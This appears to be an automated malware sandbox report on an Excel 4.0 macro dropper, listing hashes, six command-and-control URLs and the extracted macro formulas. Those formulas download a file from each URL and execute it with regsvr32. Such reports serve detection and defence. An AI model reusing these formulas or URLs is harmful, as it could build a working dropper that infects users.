General

  • Target

    f1511f2f6c2a62bfe913d924eb9fb10f3c488c646fdc4aab01593bae33bdf6e1

  • Size

    45KB

  • Sample

    241111-vk3pss1lew

  • MD5

    69b9d6b799bfe34c410a1e59ddafde8b

  • SHA1

    4f972a7a5940100af75b23229846ecde99929da6

  • SHA256

    f1511f2f6c2a62bfe913d924eb9fb10f3c488c646fdc4aab01593bae33bdf6e1

  • SHA512

    27bb17f555c4e049b971119695c410aa6bcf46a5b447a7a24e17a8787bb7b6695939d445bb9382125d442ca02704d7d3e4e4278363e6ad3188c69850f2fb9840

  • SSDEEP

    768:e+oDxDOevZCwrvt8zdDTKufT9nz0LTyY1NiMZFYpvrLeci3cr+Ud0U2XCnM:hoDxD8tT5fTR4Lh1NisFYBc3cr+U2USz

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://api.zmotpro.com/totalenvironment/logs/8wdgNaq0x/

http://aetoaluminium.com/wp-admin/gkqyKlzXoc/

http://24studypoint.com/wp-admin/3uEUtb/

https://baicc-ct.org/wp-admin/IwhcfC2sdxoToa/

https://mustknew.com/lovecalculator/osDBhPqx0tB1Vtp/

http://kiski023.com/wp-includes/Requests/Cookie/C/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://api.zmotpro.com/totalenvironment/logs/8wdgNaq0x/","..\enu.ocx",0,0)
    =IF('EFALGV'!D10<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://aetoaluminium.com/wp-admin/gkqyKlzXoc/","..\enu.ocx",0,0))
    =IF('EFALGV'!D12<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://24studypoint.com/wp-admin/3uEUtb/","..\enu.ocx",0,0))
    =IF('EFALGV'!D14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://baicc-ct.org/wp-admin/IwhcfC2sdxoToa/","..\enu.ocx",0,0))
    =IF('EFALGV'!D16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://mustknew.com/lovecalculator/osDBhPqx0tB1Vtp/","..\enu.ocx",0,0))
    =IF('EFALGV'!D18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://kiski023.com/wp-includes/Requests/Cookie/C/","..\enu.ocx",0,0))
    =IF('EFALGV'!D20<0,CLOSE(0),)
    =EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\enu.ocx")
    =RETURN()

Extracted

Language
xlm4.0

Source          URL
xlm40.dropper   http://api.zmotpro.com/totalenvironment/logs/8wdgNaq0x/
xlm40.dropper   http://aetoaluminium.com/wp-admin/gkqyKlzXoc/
xlm40.dropper   http://24studypoint.com/wp-admin/3uEUtb/
xlm40.dropper   https://baicc-ct.org/wp-admin/IwhcfC2sdxoToa/
xlm40.dropper   https://mustknew.com/lovecalculator/osDBhPqx0tB1Vtp/
xlm40.dropper   http://kiski023.com/wp-includes/Requests/Cookie/C/
